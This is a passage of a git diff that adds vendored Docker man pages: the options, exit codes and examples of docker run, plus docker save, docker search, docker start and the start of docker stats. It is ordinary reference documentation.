+**--ipc**=""
+   Default is to create a private IPC namespace (POSIX SysV IPC) for the container
+                               'container:<name|id>': reuses another container shared memory, semaphores and message queues
+                               'host': use the host shared memory,semaphores and message queues inside the container.  Note: the host mode gives the container full access to local shared memory and is therefore considered insecure.
+
+**--isolation**="*default*"
+   Isolation specifies the type of isolation technology used by containers. Note
+that the default on Windows server is `process`, and the default on Windows client
+is `hyperv`. Linux only supports `default`.
+
+**-l**, **--label**=[]
+   Set metadata on the container (e.g., --label com.example.key=value)
+
+**--kernel-memory**=""
+   Kernel memory limit (format: `<number>[<unit>]`, where unit = b, k, m or g)
+
+   Constrains the kernel memory available to a container. If a limit of 0
+is specified (not using `--kernel-memory`), the container's kernel memory
+is not limited. If you specify a limit, it may be rounded up to a multiple
+of the operating system's page size and the value can be very large,
+millions of trillions.
+
+**--label-file**=[]
+   Read in a line delimited file of labels
+
+**--link**=[]
+   Add link to another container in the form of <name or id>:alias or just <name or id>
+in which case the alias will match the name
+
+   If the operator
+uses **--link** when starting the new client container, then the client
+container can access the exposed port via a private networking interface. Docker
+will set some environment variables in the client container to help indicate
+which interface and port to use.
+
+**--link-local-ip**=[]
+   Add one or more link-local IPv4/IPv6 addresses to the container's interface
+
+**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
+  Logging driver for the container. Default is defined by daemon `--log-driver` flag.
+  **Warning**: the `docker logs` command works only for the `json-file` and
+  `journald` logging drivers.
+
+**--log-opt**=[]
+  Logging driver specific options.
+
+**-m**, **--memory**=""
+   Memory limit (format: <number>[<unit>], where unit = b, k, m or g)
+
+   Allows you to constrain the memory available to a container. If the host
+supports swap memory, then the **-m** memory setting can be larger than physical
+RAM. If a limit of 0 is specified (not using **-m**), the container's memory is
+not limited. The actual limit may be rounded up to a multiple of the operating
+system's page size (the value would be very large, that's millions of trillions).
+
+**--memory-reservation**=""
+   Memory soft limit (format: <number>[<unit>], where unit = b, k, m or g)
+
+   After setting memory reservation, when the system detects memory contention
+or low memory, containers are forced to restrict their consumption to their
+reservation. So you should always set the value below **--memory**, otherwise the
+hard limit will take precedence. By default, memory reservation will be the same
+as memory limit.
+
+**--memory-swap**="LIMIT"
+   A limit value equal to memory plus swap. Must be used with the  **-m**
+(**--memory**) flag. The swap `LIMIT` should always be larger than **-m**
+(**--memory**) value.  By default, the swap `LIMIT` will be set to double
+the value of --memory.
+
+   The format of `LIMIT` is `<number>[<unit>]`. Unit can be `b` (bytes),
+`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a
+unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap.
+
+**--mac-address**=""
+   Container MAC address (e.g. 92:d0:c6:0a:29:33)
+
+   Remember that the MAC address in an Ethernet network must be unique.
+The IPv6 link-local address will be based on the device's MAC address
+according to RFC4862.
+
+**--name**=""
+   Assign a name to the container
+
+   The operator can identify a container in three ways:
+    UUID long identifier (“f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778”)
+    UUID short identifier (“f78375b1c487”)
+    Name (“jonah”)
+
+   The UUID identifiers come from the Docker daemon, and if a name is not assigned
+to the container with **--name** then the daemon will also generate a random
+string name. The name is useful when defining links (see **--link**) (or any
+other place you need to identify a container). This works for both background
+and foreground Docker containers.
+
+**--network**="*bridge*"
+   Set the Network mode for the container
+                               'bridge': create a network stack on the default Docker bridge
+                               'none': no networking
+                               'container:<name|id>': reuse another container's network stack
+                               'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure.
+                               '<network-name>|<network-id>': connect to a user-defined network
+
+**--network-alias**=[]
+   Add network-scoped alias for the container
+
+**--oom-kill-disable**=*true*|*false*
+   Whether to disable OOM Killer for the container or not.
+
+**--oom-score-adj**=""
+   Tune the host's OOM preferences for containers (accepts -1000 to 1000)
+
+**-P**, **--publish-all**=*true*|*false*
+   Publish all exposed ports to random ports on the host interfaces. The default is *false*.
+
+   When set to true publish all exposed ports to the host interfaces. The
+default is false. If the operator uses -P (or -p) then Docker will make the
+exposed port accessible on the host and the ports will be available to any
+client that can reach the host. When using -P, Docker will bind any exposed
+port to a random port on the host within an *ephemeral port range* defined by
+`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host
+ports and the exposed ports, use `docker port`.
+
+**-p**, **--publish**=[]
+   Publish a container's port, or range of ports, to the host.
+
+   Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort`
+Both hostPort and containerPort can be specified as a range of ports.
+When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range.
+(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox`
+but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`)
+With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage`
+Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT`
+
+**--pid**=""
+   Set the PID mode for the container
+   Default is to create a private PID namespace for the container
+                               'container:<name|id>': join another container's PID namespace
+                               'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure.
+
+**--userns**=""
+   Set the usernamespace mode for the container when `userns-remap` option is enabled.
+     **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`).
+
+**--pids-limit**=""
+   Tune the container's pids limit. Set `-1` to have unlimited pids for the container.
+
+**--uts**=*host*
+   Set the UTS mode for the container
+     **host**: use the host's UTS namespace inside the container.
+     Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure.
+
+**--privileged**=*true*|*false*
+   Give extended privileges to this container. The default is *false*.
+
+   By default, Docker containers are
+“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the
+Docker container. This is because by default a container is not allowed to
+access any devices. A “privileged” container is given access to all devices.
+
+   When the operator executes **docker run --privileged**, Docker will enable access
+to all devices on the host as well as set some configuration in AppArmor to
+allow the container nearly all the same access to the host as processes running
+outside of a container on the host.
+
+**--read-only**=*true*|*false*
+   Mount the container's root filesystem as read only.
+
+   By default a container will have its root filesystem writable allowing processes
+to write files anywhere.  By specifying the `--read-only` flag the container will have
+its root filesystem mounted as read only prohibiting any writes.
+
+**--restart**="*no*"
+   Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped).
+
+**--rm**=*true*|*false*
+   Automatically remove the container when it exits. The default is *false*.
+   `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's
+incompatible with any restart policy other than `none`.
+
+**--security-opt**=[]
+   Security Options
+
+    "label=user:USER"   : Set the label user for the container
+    "label=role:ROLE"   : Set the label role for the container
+    "label=type:TYPE"   : Set the label type for the container
+    "label=level:LEVEL" : Set the label level for the container
+    "label=disable"     : Turn off label confinement for the container
+    "no-new-privileges" : Disable container processes from gaining additional privileges
+
+    "seccomp=unconfined" : Turn off seccomp confinement for the container
+    "seccomp=profile.json :  White listed syscalls seccomp Json file to be used as a seccomp filter
+
+    "apparmor=unconfined" : Turn off apparmor confinement for the container
+    "apparmor=your-profile" : Set the apparmor confinement profile for the container
+
+**--storage-opt**=[]
+   Storage driver options per container
+
+   $ docker run -it --storage-opt size=120G fedora /bin/bash
+
+   This (size) will allow to set the container rootfs size to 120G at creation time.
+   This option is only available for the `devicemapper`, `btrfs`, `overlay2`  and `zfs` graph drivers.
+   For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size.
+   For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option.
+   Under these conditions, user can pass any size less then the backing fs size.
+
+**--stop-signal**=*SIGTERM*
+  Signal to stop a container. Default is SIGTERM.
+
+**--stop-timeout**=*10*
+  Timeout (in seconds) to stop a container. Default is 10.
+
+**--shm-size**=""
+   Size of `/dev/shm`. The format is `<number><unit>`.
+   `number` must be greater than `0`.  Unit is optional and can be `b` (bytes), `k` (kilobytes), `m`(megabytes), or `g` (gigabytes).
+   If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`.
+
+**--sysctl**=SYSCTL
+  Configure namespaced kernel parameters at runtime
+
+  IPC Namespace - current sysctls allowed:
+
+  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
+  Sysctls beginning with fs.mqueue.*
+
+  If you use the `--ipc=host` option these sysctls will not be allowed.
+
+  Network Namespace - current sysctls allowed:
+      Sysctls beginning with net.*
+
+  If you use the `--network=host` option these sysctls will not be allowed.
+
+**--sig-proxy**=*true*|*false*
+   Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*.
+
+**--memory-swappiness**=""
+   Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+
+**-t**, **--tty**=*true*|*false*
+   Allocate a pseudo-TTY. The default is *false*.
+
+   When set to true Docker can allocate a pseudo-tty and attach to the standard
+input of any container. This can be used, for example, to run a throwaway
+interactive shell. The default is false.
+
+The **-t** option is incompatible with a redirection of the docker client
+standard input.
+
+**--tmpfs**=[] Create a tmpfs mount
+
+   Mount a temporary filesystem (`tmpfs`) mount into a container, for example:
+
+   $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image
+
+   This command mounts a `tmpfs` at `/tmp` within the container.  The supported mount
+options are the same as the Linux default `mount` flags. If you do not specify
+any options, the systems uses the following options:
+`rw,noexec,nosuid,nodev,size=65536k`.
+
+**-u**, **--user**=""
+   Sets the username or UID used and optionally the groupname or GID for the specified command.
+
+   The followings examples are all valid:
+   --user [user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+   Without this argument the command will be run as root in the container.
+
+**--ulimit**=[]
+    Ulimit options
+
+**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]
+   Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker
+   bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker
+   container. If 'HOST-DIR' is omitted,  Docker automatically creates the new
+   volume on the host.  The `OPTIONS` are a comma delimited list and can be:
+
+   * [rw|ro]
+   * [z|Z]
+   * [`[r]shared`|`[r]slave`|`[r]private`]
+   * [nocopy]
+
+The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR`
+can be an absolute path or a `name` value. A `name` value must start with an
+alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or
+`-` (hyphen). An absolute path starts with a `/` (forward slash).
+
+If you supply a `HOST-DIR` that is an absolute path,  Docker bind-mounts to the
+path you specify. If you supply a `name`, Docker creates a named volume by that
+`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR`
+value. If you supply the `/foo` value, Docker creates a bind-mount. If you
+supply the `foo` specification, Docker creates a named volume.
+
+You can specify multiple  **-v** options to mount one or more mounts to a
+container. To use these same mounts in other containers, specify the
+**--volumes-from** option also.
+
+You can add `:ro` or `:rw` suffix to a volume to mount it  read-only or
+read-write mode, respectively. By default, the volumes are mounted read-write.
+See examples.
+
+Labeling systems like SELinux require that proper labels are placed on volume
+content mounted into a container. Without a label, the security system might
+prevent the processes running inside the container from using the content. By
+default, Docker does not change the labels set by the OS.
+
+To change a label in the container context, you can add either of two suffixes
+`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
+objects on the shared volumes. The `z` option tells Docker that two containers
+share the volume content. As a result, Docker labels the content with a shared
+content label. Shared volume labels allow all containers to read/write content.
+The `Z` option tells Docker to label the content with a private unshared label.
+Only the current container can use a private volume.
+
+By default bind mounted volumes are `private`. That means any mounts done
+inside container will not be visible on host and vice-a-versa. One can change
+this behavior by specifying a volume mount propagation property. Making a
+volume `shared` mounts done under that volume inside container will be
+visible on host and vice-a-versa. Making a volume `slave` enables only one
+way mount propagation and that is mounts done on host under that volume
+will be visible inside container but not the other way around.
+
+To control mount propagation property of volume one can use `:[r]shared`,
+`:[r]slave` or `:[r]private` propagation flag. Propagation property can
+be specified only for bind mounted volumes and not for internal volumes or
+named volumes. For mount propagation to work source mount point (mount point
+where source dir is mounted on) has to have right propagation properties. For
+shared volumes, source mount point has to be shared. And for slave volumes,
+source mount has to be either shared or slave.
+
+Use `df <source-dir>` to figure out the source mount and then use
+`findmnt -o TARGET,PROPAGATION <source-mount-dir>` to figure out propagation
+properties of source mount. If `findmnt` utility is not available, then one
+can look at mount entry for source mount point in `/proc/self/mountinfo`. Look
+at `optional fields` and see if any propagaion properties are specified.
+`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if
+nothing is there that means mount is `private`.
+
+To change propagation properties of a mount point use `mount` command. For
+example, if one wants to bind mount source directory `/foo` one can do
+`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This
+will convert /foo into a `shared` mount point. Alternatively one can directly
+change propagation properties of source mount. Say `/` is source mount for
+`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount.
+
+> **Note**:
+> When using systemd to manage the Docker daemon's start and stop, in the systemd
+> unit file there is an option to control mount propagation for the Docker daemon
+> itself, called `MountFlags`. The value of this setting may cause Docker to not
+> see mount propagation changes made on the mount point. For example, if this value
+> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
+> a volume.
+
+To disable automatic copying of data from the container path to the volume, use
+the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes.
+
+**--volume-driver**=""
+   Container's volume driver. This driver creates volumes specified either from
+   a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag.
+   See **docker-volume-create(1)** for full details.
+
+**--volumes-from**=[]
+   Mount volumes from the specified container(s)
+
+   Mounts already mounted volumes from a source container onto another
+   container. You must supply the source's container-id. To share
+   a volume, use the **--volumes-from** option when running
+   the target container. You can share volumes even if the source container
+   is not running.
+
+   By default, Docker mounts the volumes in the same mode (read-write or
+   read-only) as it is mounted in the source container. Optionally, you
+   can change this by suffixing the container-id with either the `:ro` or
+   `:rw ` keyword.
+
+   If the location of the volume from the source container overlaps with
+   data residing on a target container, then the volume hides
+   that data on the target.
+
+**-w**, **--workdir**=""
+   Working directory inside the container
+
+   The default working directory for
+running binaries within a container is the root directory (/). The developer can
+set a different default with the Dockerfile WORKDIR instruction. The operator
+can override the working directory by using the **-w** option.
+
+# Exit Status
+
+The exit code from `docker run` gives information about why the container
+failed to run or why it exited.  When `docker run` exits with a non-zero code,
+the exit codes follow the `chroot` standard, see below:
+
+**_125_** if the error is with Docker daemon **_itself_** 
+
+    $ docker run --foo busybox; echo $?
+    # flag provided but not defined: --foo
+      See 'docker run --help'.
+      125
+
+**_126_** if the **_contained command_** cannot be invoked
+
+    $ docker run busybox /etc; echo $?
+    # exec: "/etc": permission denied
+      docker: Error response from daemon: Contained command could not be invoked
+      126
+
+**_127_** if the **_contained command_** cannot be found
+
+    $ docker run busybox foo; echo $?
+    # exec: "foo": executable file not found in $PATH
+      docker: Error response from daemon: Contained command not found or does not exist
+      127
+
+**_Exit code_** of **_contained command_** otherwise 
+    
+    $ docker run busybox /bin/sh -c 'exit 3' 
+    # 3
+
+# EXAMPLES
+
+## Running container in read-only mode
+
+During container image development, containers often need to write to the image
+content.  Installing packages into /usr, for example.  In production,
+applications seldom need to write to the image.  Container applications write
+to volumes if they need to write to file systems at all.  Applications can be
+made more secure by running them in read-only mode using the --read-only switch.
+This protects the containers image from modification. Read only containers may
+still need to write temporary data.  The best way to handle this is to mount
+tmpfs directories on /run and /tmp.
+
+    # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash
+
+## Exposing log messages from the container to the host's log
+
+If you want messages that are logged in your container to show up in the host's
+syslog/journal then you should bind mount the /dev/log directory as follows.
+
+    # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash
+
+From inside the container you can test this by sending a message to the log.
+
+    (bash)# logger "Hello from my container"
+
+Then exit and check the journal.
+
+    # exit
+
+    # journalctl -b | grep Hello
+
+This should list the message sent to logger.
+
+## Attaching to one or more from STDIN, STDOUT, STDERR
+
+If you do not specify -a then Docker will attach everything (stdin,stdout,stderr)
+. You can specify to which of the three standard streams (stdin, stdout, stderr)
+you'd like to connect instead, as in:
+
+    # docker run -a stdin -a stdout -i -t fedora /bin/bash
+
+## Sharing IPC between containers
+
+Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html
+
+Testing `--ipc=host` mode:
+
+Host shows a shared memory segment with 7 pids attached, happens to be from httpd:
+
+```
+ $ sudo ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+ 0x01128e25 0          root       600        1000       7                       
+```
+
+Now run a regular container, and it correctly does NOT see the shared memory segment from the host:
+
+```
+ $ docker run -it shm ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+```
+
+Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd:
+
+ ```
+ $ docker run -it --ipc=host shm ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+ 0x01128e25 0          root       600        1000       7                   
+```
+Testing `--ipc=container:CONTAINERID` mode:
+
+Start a container with a program to create a shared memory segment:
+```
+ $ docker run -it shm bash
+ $ sudo shm/shm_server &
+ $ sudo ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+ 0x0000162e 0          root       666        27         1                       
+```
+Create a 2nd container correctly shows no shared memory segment from 1st container:
+```
+ $ docker run shm ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+```
+
+Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first:
+
+```
+ $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m
+ $ sudo ipcs -m
+
+ ------ Shared Memory Segments --------
+ key        shmid      owner      perms      bytes      nattch     status      
+ 0x0000162e 0          root       666        27         1
+```
+
+## Linking Containers
+
+> **Note**: This section describes linking between containers on the
+> default (bridge) network, also known as "legacy links". Using `--link`
+> on user-defined networks uses the DNS-based discovery, which does not add
+> entries to `/etc/hosts`, and does not set environment variables for
+> discovery.
+
+The link feature allows multiple containers to communicate with each other. For
+example, a container whose Dockerfile has exposed port 80 can be run and named
+as follows:
+
+    # docker run --name=link-test -d -i -t fedora/httpd
+
+A second container, in this case called linker, can communicate with the httpd
+container, named link-test, by running with the **--link=<name>:<alias>**
+
+    # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash
+
+Now the container linker is linked to container link-test with the alias lt.
+Running the **env** command in the linker container shows environment variables
+ with the LT (alias) context (**LT_**)
+
+    # env
+    HOSTNAME=668231cb0978
+    TERM=xterm
+    LT_PORT_80_TCP=tcp://172.17.0.3:80
+    LT_PORT_80_TCP_PORT=80
+    LT_PORT_80_TCP_PROTO=tcp
+    LT_PORT=tcp://172.17.0.3:80
+    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+    PWD=/
+    LT_NAME=/linker/lt
+    SHLVL=1
+    HOME=/
+    LT_PORT_80_TCP_ADDR=172.17.0.3
+    _=/usr/bin/env
+
+When linking two containers Docker will use the exposed ports of the container
+to create a secure tunnel for the parent to access.
+
+If a container is connected to the default bridge network and `linked`
+with other containers, then the container's `/etc/hosts` file is updated
+with the linked container's name.
+
+> **Note** Since Docker may live update the container's `/etc/hosts` file, there
+may be situations when processes inside the container can end up reading an
+empty or incomplete `/etc/hosts` file. In most cases, retrying the read again
+should fix the problem.
+
+
+## Mapping Ports for External Usage
+
+The exposed port of an application can be mapped to a host port using the **-p**
+flag. For example, an httpd port 80 can be mapped to the host port 8080 using the
+following:
+
+    # docker run -p 8080:80 -d -i -t fedora/httpd
+
+## Creating and Mounting a Data Volume Container
+
+Many applications require the sharing of persistent data across several
+containers. Docker allows you to create a Data Volume Container that other
+containers can mount from. For example, create a named container that contains
+directories /var/volume1 and /tmp/volume2. The image will need to contain these
+directories so a couple of RUN mkdir instructions might be required for you
+fedora-data image:
+
+    # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true
+    # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash
+
+Multiple --volumes-from parameters will bring together multiple data volumes from
+multiple containers. And it's possible to mount the volumes that came from the
+DATA container in yet another container via the fedora-container1 intermediary
+container, allowing to abstract the actual data source from users of that data:
+
+    # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash
+
+## Mounting External Volumes
+
+To mount a host directory as a container volume, specify the absolute path to
+the directory and the absolute path for the container directory separated by a
+colon:
+
+    # docker run -v /var/db:/data1 -i -t fedora bash
+
+When using SELinux, be aware that the host has no knowledge of container SELinux
+policy. Therefore, in the above example, if SELinux policy is enforced, the
+`/var/db` directory is not writable to the container. A "Permission Denied"
+message will occur and an avc: message in the host's syslog.
+
+
+To work around this, at time of writing this man page, the following command
+needs to be run in order for the proper SELinux policy type label to be attached
+to the host directory:
+
+    # chcon -Rt svirt_sandbox_file_t /var/db
+
+
+Now, writing to the /data1 volume in the container will be allowed and the
+changes will also be reflected on the host in /var/db.
+
+## Using alternative security labeling
+
+You can override the default labeling scheme for each container by specifying
+the `--security-opt` flag. For example, you can specify the MCS/MLS level, a
+requirement for MLS systems. Specifying the level in the following command
+allows you to share the same content between containers.
+
+    # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash
+
+An MLS example might be:
+
+    # docker run --security-opt label=level:TopSecret -i -t rhel7 bash
+
+To disable the security labeling for this container versus running with the
+`--permissive` flag, use the following command:
+
+    # docker run --security-opt label=disable -i -t fedora bash
+
+If you want a tighter security policy on the processes within a container,
+you can specify an alternate type for the container. You could run a container
+that is only allowed to listen on Apache ports by executing the following
+command:
+
+    # docker run --security-opt label=type:svirt_apache_t -i -t centos bash
+
+Note:
+
+You would have to write policy defining a `svirt_apache_t` type.
+
+## Setting device weight
+
+If you want to set `/dev/sda` device weight to `200`, you can specify the device
+weight by `--blkio-weight-device` flag. Use the following command:
+
+   # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu
+
+## Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Microsoft Windows. The `--isolation <value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. These two commands are equivalent on Linux:
+
+```
+$ docker run -d busybox top
+$ docker run -d --isolation default busybox top
+```
+
+On Microsoft Windows, can take any of these values:
+
+* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.
+* `process`: Namespace isolation only.
+* `hyperv`: Hyper-V hypervisor partition-based isolation.
+
+In practice, when running on Microsoft Windows without a `daemon` option set,  these two commands are equivalent:
+
+```
+$ docker run -d --isolation default busybox top
+$ docker run -d --isolation process busybox top
+```
+
+If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation:
+
+```
+$ docker run -d --isolation default busybox top
+$ docker run -d --isolation hyperv busybox top
+```
+
+## Setting Namespaced Kernel Parameters (Sysctls)
+
+The `--sysctl` sets namespaced kernel parameters (sysctls) in the
+container. For example, to turn on IP forwarding in the containers
+network namespace, run this command:
+
+    $ docker run --sysctl net.ipv4.ip_forward=1 someimage
+
+Note:
+
+Not all sysctls are namespaced. Docker does not support changing sysctls
+inside of a container that also modify the host system. As the kernel 
+evolves we expect to see more sysctls become namespaced.
+
+See the definition of the `--sysctl` option above for the current list of 
+supported sysctls.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+November 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md
new file mode 100644
index 0000000000..1d1de8a1df
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-save.1.md
@@ -0,0 +1,45 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-save - Save one or more images to a tar archive (streamed to STDOUT by default)
+
+# SYNOPSIS
+**docker save**
+[**--help**]
+[**-o**|**--output**[=*OUTPUT*]]
+IMAGE [IMAGE...]
+
+# DESCRIPTION
+Produces a tarred repository to the standard output stream. Contains all
+parent layers, and all tags + versions, or specified repo:tag.
+
+Stream to a file instead of STDOUT by using **-o**.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-o**, **--output**=""
+   Write to a file, instead of STDOUT
+
+# EXAMPLES
+
+Save all fedora repository images to a fedora-all.tar and save the latest
+fedora image to a fedora-latest.tar:
+
+    $ docker save fedora > fedora-all.tar
+    $ docker save --output=fedora-latest.tar fedora:latest
+    $ ls -sh fedora-all.tar
+    721M fedora-all.tar
+    $ ls -sh fedora-latest.tar
+    367M fedora-latest.tar
+
+# See also
+**docker-load(1)** to load an image from a tar archive on STDIN.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md
new file mode 100644
index 0000000000..ad8bbc78b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-search.1.md
@@ -0,0 +1,70 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-search - Search the Docker Hub for images
+
+# SYNOPSIS
+**docker search**
+[**-f**|**--filter**[=*[]*]]
+[**--help**]
+[**--limit**[=*LIMIT*]]
+[**--no-trunc**]
+TERM
+
+# DESCRIPTION
+
+Search Docker Hub for images that match the specified `TERM`. The table
+of images returned displays the name, description (truncated by default), number
+of stars awarded, whether the image is official, and whether it is automated.
+
+*Note* - Search queries will only return up to 25 results
+
+# OPTIONS
+
+**-f**, **--filter**=[]
+   Filter output based on these conditions:
+   - stars=<numberOfStar>
+   - is-automated=(true|false)
+   - is-official=(true|false)
+
+**--help**
+  Print usage statement
+
+**--limit**=*LIMIT*
+  Maximum returned search results. The default is 25.
+
+**--no-trunc**=*true*|*false*
+   Don't truncate output. The default is *false*.
+
+# EXAMPLES
+
+## Search Docker Hub for ranked images
+
+Search a registry for the term 'fedora' and only display those images
+ranked 3 or higher:
+
+    $ docker search --filter=stars=3 fedora
+    NAME                  DESCRIPTION                                    STARS OFFICIAL  AUTOMATED
+    mattdm/fedora         A basic Fedora image corresponding roughly...  50
+    fedora                (Semi) Official Fedora base image.             38
+    mattdm/fedora-small   A small Fedora image on which to build. Co...  8
+    goldmann/wildfly      A WildFly application server running on a ...  3               [OK]
+
+## Search Docker Hub for automated images
+
+Search Docker Hub for the term 'fedora' and only display automated images
+ranked 1 or higher:
+
+    $ docker search --filter=is-automated=true --filter=stars=1 fedora
+    NAME               DESCRIPTION                                     STARS OFFICIAL  AUTOMATED
+    goldmann/wildfly   A WildFly application server running on a ...   3               [OK]
+    tutum/fedora-20    Fedora 20 image with SSH access. For the r...   1               [OK]
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
+April 2016, updated by Vincent Demeester <vincent@sbr.pm>
+
diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md
new file mode 100644
index 0000000000..c00b0a1668
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-start.1.md
@@ -0,0 +1,39 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-start - Start one or more containers
+
+# SYNOPSIS
+**docker start**
+[**-a**|**--attach**]
+[**--detach-keys**[=*[]*]]
+[**--help**]
+[**-i**|**--interactive**]
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+Start one or more containers.
+
+# OPTIONS
+**-a**, **--attach**=*true*|*false*
+   Attach container's STDOUT and STDERR and forward all signals to the
+   process. The default is *false*.
+
+**--detach-keys**=""
+   Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-<value>` where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**--help**
+  Print usage statement
+
+**-i**, **--interactive**=*true*|*false*
+   Attach container's STDIN. The default is *false*.
+
+# See also
+**docker-stop(1)** to stop a container.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md
new file mode 100644
index 0000000000..0f022cd412
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-stats.1.md
@@ -0,0 +1,57 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-stats - Display a live stream of one or more containers' resource usage statistics
+
+# SYNOPSIS
+**docker stats**
+[**-a**|**--all**]
+[**--help**]
+[**--no-stream**]
+[**--format[="*TEMPLATE*"]**]
+[CONTAINER...]
+
+# DESCRIPTION
+
+Display a live stream of one or more containers' resource usage statistics
+
+# OPTIONS
+**-a**, **--all**=*true*|*false*
+   Show all containers. Only running containers are shown by default. The default is *false*.
+
+**--help**
+  Print usage statement
+
+**--no-stream**=*true*|*false*
